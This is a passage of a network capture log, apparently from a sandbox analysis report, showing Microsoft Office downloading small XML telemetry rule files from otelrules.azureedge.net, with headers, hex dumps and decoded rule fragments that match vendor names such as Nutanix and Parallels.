                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:28 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:28 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 415
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                      x-ms-request-id: cc92db4a-701e-0053-3460-173a0a000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185128Z-1657d5bbd482lxwq1dp2t1zwkc00000005100000000102gt
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:28 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      50192.168.2.74975313.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:28 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:28 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:28 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 479
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                      ETag: "0x8DC582B989EE75B"
                                                                                                      x-ms-request-id: 27b6de9f-001e-0046-1e00-17da4b000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185128Z-1657d5bbd48brl8we3nu8cxwgn00000005t0000000002t47
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:28 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      51192.168.2.74975513.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:28 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:28 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:28 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 419
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                      ETag: "0x8DC582B9C710B28"
                                                                                                      x-ms-request-id: 1ed82642-401e-0048-7b12-170409000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185128Z-1657d5bbd48gqrfwecymhhbfm800000004a0000000000nsw
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:28 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      52192.168.2.74975713.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:28 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:28 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:28 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 477
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                      ETag: "0x8DC582BA54DCC28"
                                                                                                      x-ms-request-id: a04ea264-601e-0084-12f6-186b3f000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185128Z-1657d5bbd48tqvfc1ysmtbdrg0000000058000000000fftg
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:28 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      53192.168.2.74975813.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:29 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:29 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:29 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 419
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                      ETag: "0x8DC582BB7F164C3"
                                                                                                      x-ms-request-id: 3a03d6b9-d01e-0066-52e9-16ea17000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185129Z-1657d5bbd48q6t9vvmrkd293mg000000059000000000vcw2
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:29 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      54192.168.2.74976013.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:29 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:29 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:29 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 419
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                      ETag: "0x8DC582B9FF95F80"
                                                                                                      x-ms-request-id: 938e68e0-901e-0029-0160-17274a000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185129Z-1657d5bbd48tqvfc1ysmtbdrg0000000059g0000000085hf
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:29 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      55192.168.2.74975913.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:29 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:29 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:29 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 477
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                      ETag: "0x8DC582BA48B5BDD"
                                                                                                      x-ms-request-id: 27cd2a1a-001e-0046-1b08-17da4b000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185129Z-1657d5bbd4824mj9d6vp65b6n400000005ng0000000072vy
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:29 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      56192.168.2.74976213.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:29 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:29 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:29 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 468
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                      ETag: "0x8DC582BB3EAF226"
                                                                                                      x-ms-request-id: b0fdb72d-401e-0015-37ce-160e8d000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185129Z-1657d5bbd48xsz2nuzq4vfrzg800000005400000000134p2
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:29 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      57192.168.2.74976113.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:29 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:29 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:29 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 472
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                      ETag: "0x8DC582BB650C2EC"
                                                                                                      x-ms-request-id: d803a4ff-401e-0083-3904-17075c000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185129Z-1657d5bbd48sqtlf1huhzuwq700000000500000000011peb
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:29 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      58192.168.2.74976613.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:29 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:29 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:29 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 427
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                      ETag: "0x8DC582BB556A907"
                                                                                                      x-ms-request-id: 963c402d-c01e-00ad-09ed-18a2b9000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185129Z-1657d5bbd48cpbzgkvtewk0wu000000005eg00000000kwgv
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:29 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      59192.168.2.74976413.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:29 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:29 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:29 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 411
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                      ETag: "0x8DC582B989AF051"
                                                                                                      x-ms-request-id: 8d044b15-901e-00ac-3902-17b69e000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185129Z-1657d5bbd48jwrqbupe3ktsx9w00000005gg00000000w7kx
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
